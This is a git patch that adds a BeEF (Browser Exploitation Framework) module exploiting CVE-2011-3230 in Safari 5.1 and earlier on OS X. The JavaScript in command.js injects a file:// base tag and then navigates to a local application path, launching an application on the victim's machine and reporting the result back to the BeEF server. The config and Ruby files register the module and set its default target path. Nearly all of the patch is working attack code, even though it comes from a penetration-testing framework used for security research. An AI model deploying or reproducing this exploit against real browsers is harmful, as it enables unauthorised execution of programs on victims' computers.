From b6a8205b27d0f684fc7d91164637c110812ba534 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Wed, 19 Oct 2011 18:47:55 +0000
Subject: [PATCH] (Fixes issue 547) added module for Safari exploit
 (CVE-2011-3230)

git-svn-id: https://beef.googlecode.com/svn/trunk@1373 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 modules/exploits/safari_launch_app/command.js | 23 ++++++++++++++++
 .../exploits/safari_launch_app/config.yaml    | 26 +++++++++++++++++++
 modules/exploits/safari_launch_app/module.rb  | 24 +++++++++++++++++
 3 files changed, 73 insertions(+)
 create mode 100755 modules/exploits/safari_launch_app/command.js
 create mode 100755 modules/exploits/safari_launch_app/config.yaml
 create mode 100755 modules/exploits/safari_launch_app/module.rb

diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/safari_launch_app/command.js
new file mode 100755
index 000000000..2952af608
--- /dev/null
+++ b/modules/exploits/safari_launch_app/command.js
@@ -0,0 +1,23 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+    var baseTag = document.createElement('base');
+    baseTag.setAttribute('id', 'sla_<%= @command_id %>');
+    baseTag.setAttribute('href', 'file://');
+    document.head.appendChild(baseTag);
+    setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000);
+    setTimeout('document.head.removeChild(document.getElementById("sla_<%= @command_id %>"));beef.net.send("<%= @command_url %>", <%= @command_id %>, "Base tag removed");', 1000);
+});
diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/safari_launch_app/config.yaml
new file mode 100755
index 000000000..90b085455
--- /dev/null
+++ b/modules/exploits/safari_launch_app/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        safari_launch_app:
+            enable: true
+            category: "Exploits"
+            name: "Safari Launch App"
+            description: "Launch an application from the victim machine.<br /><br />The file:// protocol handler will be used<br /><br />Safari <= 5.1 on OS X is vulnerable<br/>Original discovery by Aaron Sigel. Also see CVE-2011-3230"
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["S"]
+                not_working: ["All"]
diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/safari_launch_app/module.rb
new file mode 100755
index 000000000..d9aff9a85
--- /dev/null
+++ b/modules/exploits/safari_launch_app/module.rb
@@ -0,0 +1,24 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Safari_launch_app < BeEF::Core::Command
+
+  def self.options
+    return [
+        {'name'=>'app_path', 'ui_label' => 'Application Path', 'value' => '/usr/sbin/netstat'},
+    ]
+  end  
+
+end